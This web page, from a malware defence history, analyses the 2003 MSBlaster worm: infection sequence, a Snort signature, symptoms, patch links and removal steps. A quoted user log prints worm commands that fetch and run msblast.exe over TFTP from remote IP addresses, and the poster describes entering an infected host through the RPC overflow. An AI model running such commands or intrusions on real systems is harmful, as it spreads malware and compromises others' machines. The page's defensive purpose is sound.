Softpanorama

May the source be with you, but remember the KISS principle ;-)
Home Switchboard Unix Administration Red Hat TCP/IP Networks Neoliberalism Toxic Managers
(slightly skeptical) Educational society promoting "Back to basics" movement against IT overcomplexity and  bastardization of classic Unix

Malware Defense History

by Dr. Nikolai Bezroukov.

Copyright: Dr. Nikolai Bezroukov 1994-2013. Unpublished notes. Version 0.80.October, 2013

Contents : Foreword : Ch01 : Ch02 : Ch03  : Ch04 : Ch05 : Ch06 : Ch07 : Ch08 : Ch09 : Ch10 : Ch11 : Ch12 : Ch13


Chapter 7: Network worms

MSBlaster Worm

  1. Old News

  2. Recommended Links

  3. Manual removal instructions

Abstract

The Blaster worm uses a series of components to successfully infect a host. The first component is a publicly available RPC DCOM exploit that binds a system level shell to port 4444. This exploit is used to initiate a command channel between the infecting agent and the vulnerable target. Once the target is successfully compromised, the worm transmits the msblast.exe executable (the main body of the worm) via TFTP to infect the host. The payload used in the public DCOM exploit, as well as the TFTP functionality, are both encapsulated within msblast.exe.78

Existing RPC DCOM snort signatures will detect this worm. The worm is based on dcom.c

Infection sequence:

  1. SOURCE sends packets to port 135 tcp with variation of dcom.c exploit to TARGET

  2. this causes a remote shell on port 4444 at the TARGET

  3. the SOURCE now sends the tftp get command to the TARGET, using the shell on port 4444,

  4. the target will now connect to the tftp server at the SOURCE.

Top Visited
Switchboard
Latest
Past week
Past month

NEWS CONTENTS

Old News ;-)

The existing RPC/DCOM signature in freeware Snort intrusion detection system will detect this worm as it enters a monitored network. Symantec provided another Snort signature, which is listed below (see their analysis report here):

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 \
(msg:"DCE RPC Interface Buffer Overflow Exploit"; \
content:"|00 5C 00 5C|"; \
content:!"|5C|"; within:32; \
flow:to_server,established; \
reference:bugtraq,8205; rev: 1; )

Download details MS03-026 Scanning Tool Microsoft has released a tool, KB 823980scan.exe, that can be used to scan networks to identify host computers that do not have the 823980 Security Patch (MS03-026) installed.

For additional information about the Security Patch (MS03-026), Please review Knowledge Base Article 823980 in the Microsoft Knowledge Base.

sniffing my connection i detected a new worm propagating by the rpc dcom overflow

i saw a couple of connection trying to connect on my port 4444 so i did a little listen on it
---------
tftp -i 142.217.249.63 GET msblast.exe
tftp -i 142.217.242.78 GET msblast.exe
start msblast.exe
msblast.exe
start msblast.exe
msblast.exe
tftp -i 142.217.247.115 GET msblast.exe
start msblast.exe
msblast.exe
tftp -i 142.217.254.164 GET msblast.exe
tftp -i 142.217.228.200 GET msblast.exe
start msblast.exe
msblast.exe
tftp -i .... and it continues...

------------------------------

so i got into one of those computer with the rpc overflow and download MSBLAST.exe
i installed it
i begins the scan by 108.41.62.1-255 on port 135

and it put itself into the registry on the startup
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\windows auto update "msblast.exe"

Worm exploits the DCOM RPC vulnerability in Microsoft Windows described in MS Security Bulletin MS03-026.

Written in C using the LCC compiler. The worm is a Windows PE EXE file about 6KB (compressed via UPX - 11KB when decompressed). Lovesan downloads and attempts to run a file named msblast.exe.

The text is as follows:

I just want to say LOVE YOU SAN!!
billy gates why do you make this possible? Stop making money and fix your software!!

Symptoms of Infection:

MSBLAST.Exe in the Windows system32 folder.
Error message: RPC service failure. This causes the system to reboot.

How the Worm Spreads

Lovesan registers itself in the autorun key when the system reboots and launches itself every time the computer reboots in the future:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr
entVersion\Run
windows auto update="msblast.exe"
The worm then scans IP addresses, attempting to connect to 20 random IP addresses and infect any vulnerable machines. Lovesan sleeps for 1.8 seconds and scans the next 20 IP addresses. Lovesan scans IP addresses following one of the patterns below:

In 3 out of 5 cases Lovesan selects random base IP addresses (A.B.C.D) where D is equal to 0, while A, B and C are random numbers between 0 and 255.

In the remaining 2 out of 5 cases Lovesan scans the subnet and gets the local IP address of the infected machine, extracts values A and B from it and sets D to 0. Then the worm extracts the C value.

If C is less than or equal to 20, then Lovesan does not modify C. Thus, if the local IP address is 207.46.14.1 the worm will scan IP addresses starting from 207.46.14.0

If C is greater than 20, than Lovesan selects a random value between C and C-19. Thus, if the IP address of the infected machine is 207.46.134.191 the worm will scan IP addresses 207.46.{115-134}.0

The worm sends a buffer-overrun request to vulnerable machines via TCP port 135. The newly infected machine then initiates the command shell on TCP port 4444.
Lovesan runs the thread that opens the connection on port 4444 and waits for FTP 'get' request from the victim machine. The worm then forces the victim machine to sends the 'FTP get' request. Thus the victim machine downloads the worm from the infected machine and runs it. The victim machine is now also infected.

Configure TCP/IP security on Windows 2000:

--Select "Network and Dial-up Connections" in the control panel.

--Right-click the interface you use to access the Internet, and then click "Properties".

--In the "Components checked are used by this connection" box, click "Internet Protocol (TCP/IP)", and then click "Properties".

--In the Internet Protocol (TCP/IP) Properties dialog box, click "Advanced".

--Click the "Options" tab.

--Click "TCP/IP filtering", and then click "Properties".

--Select the "Enable TCP/IP Filtering (All adapters)" check box.

--There are three columns with the following labels:

TCP Ports

UDP Ports

IP Protocols

--In each column, you must select the "Permit Only" option. >

--Click OK.

PSS Security Response Team Alert - New Worm: W32.Blaster.worm

SEVERITY: CRITICAL

DATE: Updated August 12, 2003

PRODUCTS AFFECTED: Windows XP, Windows 2000, Windows Server 2003, Windows NT 4.0, NT 4.0 Terminal Services Edition

WHAT IS IT?

The Microsoft Product Support Services Security Team is issuing this alert to inform customers about a new worm named W32.Blaster.Worm which is spreading in the wild. This virus is also known as: W32/Lovsan.worm (McAfee), WORM_MSBLAST.A (Trendmicro), Win32.Posa.Worm (Computer Associates). Best practices, such as applying security patch MS03-026 should prevent infection from this worm.

Date discovered: August 11, 2003. Customers who had previously applied the security patch MS03-026 are protected. To determine if the virus is present on your machine see the technical details below.

IMPACT OF ATTACK:

Spread through open RPC ports. Customer's machine gets re-booted or the file "msblast.exe" exists on customer's system.

TECHNICAL DETAILS:

This worm scans a random IP range to look for vulnerable systems on TCP port 135. The worm attempts to exploit the DCOM RPC vulnerability patched by MS03-026.

Once the Exploit code is sent to a system, it downloads and executes the file MSBLAST.EXE from a remote system via TFTP. Once run, the worm creates the registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! bill

Symptoms of the virus: Some customers may not notice any symptoms at all. A typical symptom is the system is rebooting every few minutes without user input. Customers may also see:

- Presence of unusual TFTP* files
- Presence of the file msblast.exe in the WINDOWS SYSTEM32 directory

To detect this virus, search for msblast.exe in the WINDOWS SYSTEM32 directory or download the latest anti-virus software signature from your anti-virus vendor and scan your machine.

For additional information on recovering from this attack please contact your preferred anti-virus vendor.

RECOVERY:

Many Antivirus companies have written tools to remove the known exploit associated with this particular worm. To download the removal tool from your antivirus vendor follow procedures outlined below.

For Windows XP

First, enable the built in firewall such as Internet Connection Firewall (ICF) in Windows XP: http://support.microsoft.com/?id=283673

--In Control Panel, double-click "Networking and Internet Connections", and then click "Network Connections".

--Right-click the connection on which you would like to enable ICF, and then click "Properties".

--On the Advanced tab, click the box to select the option to "Protect my computer or network".

Second, download the MS03-026 security patch from Microsoft:

Windows XP (32 bit)

http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe

Windows XP (64 bit)

http://download.microsoft.com/download/a/7/5/a75b3c8f-5df0-451b-b526-cfc7c5c67df5/WindowsXP-KB823980-ia64-ENU.exe

Third, install or update your antivirus signature software

Then, download the worm removal tool from your antivirus vendor.

For Windows 2000 systems, where Internet Connection Firewall (ICF) is not available, the following steps will help block the affected ports so that the system can be patched. These steps are based on a modified excerpt from the article; HOW TO: Configure TCP/IP Filtering in Windows 2000. http://support.microsoft.com/?id=309798

1. Configure TCP/IP security on Windows 2000:

--Select "Network and Dial-up Connections" in the control panel.

--Right-click the interface you use to access the Internet, and then click "Properties".

--In the "Components checked are used by this connection" box, click "Internet Protocol (TCP/IP)", and then click "Properties".

--In the Internet Protocol (TCP/IP) Properties dialog box, click "Advanced".

--Click the "Options" tab.

--Click "TCP/IP filtering", and then click "Properties".

--Select the "Enable TCP/IP Filtering (All adapters)" check box.

--There are three columns with the following labels:

TCP Ports

UDP Ports

IP Protocols

--In each column, you must select the "Permit Only" option. >

--Click OK.

2. Download the MS03-026 security patch for Windows 2000 from Microsoft at: http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe

3. Install or update your antivirus signature software

4. Then, download the worm removal tool from your antivirus vendor.

For additional details on this worm from anti-virus software vendors participating in the Microsoft Virus Information Alliance (VIA) please visit the following links:

Please contact your Antivirus Vendor for additional details on this virus.

PREVENTION:

Turn on Internet Connection Firewall (Windows XP or Windows Server 2003) or use a third party firewall to block TCP ports 135, 139, 445 and 593; UDP port 135, 137,138;also UDP 69 (TFTP)and TCP 4444 for remote command shell. To enable the Internet Connection Firewall in Windows: http://support.microsoft.com/?id=283673

This worm utilizes a previously-announced vulnerability as part of its infection method. Because of this, customers must ensure that their computers are patched for the vulnerability that is identified in Microsoft Security Bulletin MS03-026. http://www.microsoft.com/technet/security/bulletin/MS03-026.asp.

Install the patch MS03-026 from Windows Update:

Windows NT 4 Server & Workstation

http://download.microsoft.com/download/6/5/1/651c3333-4892-431f-ae93-bf8718d29e1a/Q823980i.EXE

Windows NT 4 Terminal Server Edition

http://download.microsoft.com/download/4/6/c/46c9c414-19ea-4268-a430-53722188d489/Q823980i.EXE

Windows 2000

http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe

Windows XP (32 bit)

http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe

Windows XP (64 bit)

http://download.microsoft.com/download/a/7/5/a75b3c8f-5df0-451b-b526-cfc7c5c67df5/WindowsXP-KB823980-ia64-ENU.exe

Windows 2003 (32 bit)

http://download.microsoft.com/download/8/f/2/8f21131d-9df3-4530-802a-2780629390b9/WindowsServer2003-KB823980-x86-ENU.exe

Windows 2003 (64 bit)

http://download.microsoft.com/download/4/0/3/403d6631-9430-4ff6-a061-9072a4c50425/WindowsServer2003-KB823980-ia64-ENU.exe

As always, please make sure to use the latest Anti-Virus detection from your Anti-Virus vendor to detect new viruses and their variants.

RELATED KB'S:
http://support.microsoft.com/?kbid=826955

RELATED MICROSOFT SECURITY BULLETINS:
http://www.microsoft.com/technet/security/bulletin/MS03-026.asp

RELATED LINKS:
http://www.microsoft.com/security/incident/blast.asp

If you have any questions regarding this alert please contact your Microsoft representative or 1-866-727-2338 (1-866-PCSafety) within the US, outside of the US please contact your local Microsoft Subsidiary.

PSS Security Response Team

Recommended Links

Google matched content

Softpanorama Recommended

Top articles

Sites

CERT Advisory CA-2003-20 W32/Blaster worm

Microsoft RPC Exploit and W32.Blaster.Worm

Network Associates:
http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=100547

Trend Micro:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A

Symantec:
http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html

Computer Associates:
http://www3.ca.com/virusinfo/virus.aspx?ID=36265

For more information on Microsoft's Virus Information Alliance please visit this link:
http://www.microsoft.com/technet/security/virus/via.asp

Microsoft TechNet

Manual removal instructions

1. Delete the registry key found at:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: "windows auto update"
String: "msblast.exe"
2. Look for "msblast.exe" running in the task manager. If it is running, kill the process.
3. Delete the file "msblast.exe" found in %systemroot%\system32\msblast.exe

You can also use a free clean-up tool provided by Symantec. Shavlik Technologies also provides a free version of its HFNetChk Lite software, which can scan your entire network for missing Microsoft patches and automate patch installation for up to 50 systems.

Tobias E. Schmidt of Winona University posted two visual basic scripts that can be used to help control the worm while patches are rolled out and to help clean up infected systems. The scripts can be inserted into computer startup and user logon sequences using Group Policy.

The number of target systems scanned for an open port 135, which the worm uses to spread, have been considerably higher since Microsoft released is security bulletin on July 16. Trends reveal that since that time the number of hosts performing scans has increased dramatically. Where before July 16 there were roughly 900 to 1100 systems scanning for port 135, as of August 11 there were over 58,900 systems performing scans, many of which are probably systems infected with the new worm.

Etc

To monitor the situation be sure to visit Incidents.org or Dshield.org regularly, where you can learn more about the worm, as well as learn about general trends and patterns of many different intrusion attempts.

On Monday, a few minutes after news of the new worm spread to the Bugtraq mailing list, an anonymous user with an email address from a Hotmail account posted a message to the list which contains link to another set of exploit code for the RPC/DCOM problem. The zip file contains a copy of the code, a compiled executable, as well as a macro file that can used once the exploit inserts a backdoor command shell into an infected the system. The code, called KaHT II, is capable of spreading itself to other systems rapidly.

You can also read more about the RPC/DCOM vulnerability in other articles on our Web site, and find links to Snort and its accessories list below:


Buffer Overrun In RPC Interface Could Allow Code Execution

More technical details, how to defend your systems, and user reports regarding patch installation issues:

UPDATE: MS Patches Leave Systems Insecure and Break Services

Commentary and other details:

Are You Vulnerable to RPC Exploitation?

Commentary and other details:

The RPC/DCOM Bugs: How Bad Are They?

Snort IDS - Win32 Version; and IDSCenter (GUI for Snort)

Download Snort for Win32 platforms

Download IDSCenter (from Engage Security)

Download the latest Snort Rulesets

Read Windows & .NET Magazine articles about Snort


Etc

Society

Groupthink : Two Party System as Polyarchy : Corruption of Regulators : Bureaucracies : Understanding Micromanagers and Control Freaks : Toxic Managers :   Harvard Mafia : Diplomatic Communication : Surviving a Bad Performance Review : Insufficient Retirement Funds as Immanent Problem of Neoliberal Regime : PseudoScience : Who Rules America : Neoliberalism  : The Iron Law of Oligarchy : Libertarian Philosophy

Quotes

War and Peace : Skeptical Finance : John Kenneth Galbraith :Talleyrand : Oscar Wilde : Otto Von Bismarck : Keynes : George Carlin : Skeptics : Propaganda  : SE quotes : Language Design and Programming Quotes : Random IT-related quotesSomerset Maugham : Marcus Aurelius : Kurt Vonnegut : Eric Hoffer : Winston Churchill : Napoleon Bonaparte : Ambrose BierceBernard Shaw : Mark Twain Quotes

Bulletin:

Vol 25, No.12 (December, 2013) Rational Fools vs. Efficient Crooks The efficient markets hypothesis : Political Skeptic Bulletin, 2013 : Unemployment Bulletin, 2010 :  Vol 23, No.10 (October, 2011) An observation about corporate security departments : Slightly Skeptical Euromaydan Chronicles, June 2014 : Greenspan legacy bulletin, 2008 : Vol 25, No.10 (October, 2013) Cryptolocker Trojan (Win32/Crilock.A) : Vol 25, No.08 (August, 2013) Cloud providers as intelligence collection hubs : Financial Humor Bulletin, 2010 : Inequality Bulletin, 2009 : Financial Humor Bulletin, 2008 : Copyleft Problems Bulletin, 2004 : Financial Humor Bulletin, 2011 : Energy Bulletin, 2010 : Malware Protection Bulletin, 2010 : Vol 26, No.1 (January, 2013) Object-Oriented Cult : Political Skeptic Bulletin, 2011 : Vol 23, No.11 (November, 2011) Softpanorama classification of sysadmin horror stories : Vol 25, No.05 (May, 2013) Corporate bullshit as a communication method  : Vol 25, No.06 (June, 2013) A Note on the Relationship of Brooks Law and Conway Law

History:

Fifty glorious years (1950-2000): the triumph of the US computer engineering : Donald Knuth : TAoCP and its Influence of Computer Science : Richard Stallman : Linus Torvalds  : Larry Wall  : John K. Ousterhout : CTSS : Multix OS Unix History : Unix shell history : VI editor : History of pipes concept : Solaris : MS DOSProgramming Languages History : PL/1 : Simula 67 : C : History of GCC developmentScripting Languages : Perl history   : OS History : Mail : DNS : SSH : CPU Instruction Sets : SPARC systems 1987-2006 : Norton Commander : Norton Utilities : Norton Ghost : Frontpage history : Malware Defense History : GNU Screen : OSS early history

Classic books:

The Peter Principle : Parkinson Law : 1984 : The Mythical Man-MonthHow to Solve It by George Polya : The Art of Computer Programming : The Elements of Programming Style : The Unix Hater’s Handbook : The Jargon file : The True Believer : Programming Pearls : The Good Soldier Svejk : The Power Elite

Most popular humor pages:

Manifest of the Softpanorama IT Slacker Society : Ten Commandments of the IT Slackers Society : Computer Humor Collection : BSD Logo Story : The Cuckoo's Egg : IT Slang : C++ Humor : ARE YOU A BBS ADDICT? : The Perl Purity Test : Object oriented programmers of all nations : Financial Humor : Financial Humor Bulletin, 2008 : Financial Humor Bulletin, 2010 : The Most Comprehensive Collection of Editor-related Humor : Programming Language Humor : Goldman Sachs related humor : Greenspan humor : C Humor : Scripting Humor : Real Programmers Humor : Web Humor : GPL-related Humor : OFM Humor : Politically Incorrect Humor : IDS Humor : "Linux Sucks" Humor : Russian Musical Humor : Best Russian Programmer Humor : Microsoft plans to buy Catholic Church : Richard Stallman Related Humor : Admin Humor : Perl-related Humor : Linus Torvalds Related humor : PseudoScience Related Humor : Networking Humor : Shell Humor : Financial Humor Bulletin, 2011 : Financial Humor Bulletin, 2012 : Financial Humor Bulletin, 2013 : Java Humor : Software Engineering Humor : Sun Solaris Related Humor : Education Humor : IBM Humor : Assembler-related Humor : VIM Humor : Computer Viruses Humor : Bright tomorrow is rescheduled to a day after tomorrow : Classic Computer Humor

The Last but not Least Technology is dominated by two types of people: those who understand what they do not manage and those who manage what they do not understand ~Archibald Putt. Ph.D


Copyright © 1996-2021 by Softpanorama Society. www.softpanorama.org was initially created as a service to the (now defunct) UN Sustainable Development Networking Programme (SDNP) without any remuneration. This document is an industrial compilation designed and created exclusively for educational use and is distributed under the Softpanorama Content License. Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.

FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available to advance understanding of computer science, IT technology, economic, scientific, and social issues. We believe this constitutes a 'fair use' of any such copyrighted material as provided by section 107 of the US Copyright Law according to which such material can be distributed without profit exclusively for research and educational purposes.

This is a Spartan WHYFF (We Help You For Free) site written by people for whom English is not a native language. Grammar and spelling errors should be expected. The site contain some broken links as it develops like a living tree...

You can use PayPal to to buy a cup of coffee for authors of this site

Disclaimer:

The statements, views and opinions presented on this web page are those of the author (or referenced source) and are not endorsed by, nor do they necessarily reflect, the opinions of the Softpanorama society. We do not warrant the correctness of the information provided or its fitness for any purpose. The site uses AdSense so you need to be aware of Google privacy policy. You you do not want to be tracked by Google please disable Javascript for this site. This site is perfectly usable without Javascript.

Last modified: March 12, 2019